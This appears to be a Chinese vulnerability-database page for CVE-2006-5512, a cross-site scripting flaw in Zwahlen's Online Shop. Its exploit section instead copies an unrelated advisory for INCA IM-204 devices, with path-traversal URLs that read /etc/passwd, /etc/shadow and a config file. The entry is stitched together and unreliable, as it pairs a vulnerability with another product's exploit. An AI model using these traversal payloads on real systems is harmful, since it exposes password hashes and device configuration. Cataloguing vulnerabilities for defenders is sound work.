Zwahlen's Online Shop 'article.htm' Cat参数跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111356 漏洞类型 跨站脚本
发布时间 2006-10-23 更新时间 2007-07-06
CVE编号 CVE-2006-5512 CNNVD-ID CNNVD-200610-425
漏洞平台 Hardware CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/28848
https://www.securityfocus.com/bid/20682
https://cxsecurity.com/issue/WLB-2006100135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-425
|漏洞详情
ZwahlenOnlineShop的article.htm中存在跨站点脚本漏洞,远程攻击者可以通过cat参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/20696/info

INCA IM-204 devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.

This BID may be related to BID 20689; the issues are very similar in nature.

http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/shadow
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml
|受影响的产品
Zwahlen Informatik Online Shop 5.2.2
|参考资料

来源:BUGTRAQ
名称:20061022XSSinZwahlenOnlineShop
链接:http://www.securityfocus.com/archive/1/archive/1/449467/100/0/threaded
来源:XF
名称:zwahlen-article-xss(29753)
链接:http://xforce.iss.net/xforce/xfdb/29753
来源:BID
名称:20682
链接:http://www.securityfocus.com/bid/20682
来源:SREASON
名称:1773
链接:http://securityreason.com/securityalert/1773
来源:VIM
名称:20061103ZwahlenOnlineShop
链接:http://attrition.org/pipermail/vim/2006-November/001106.html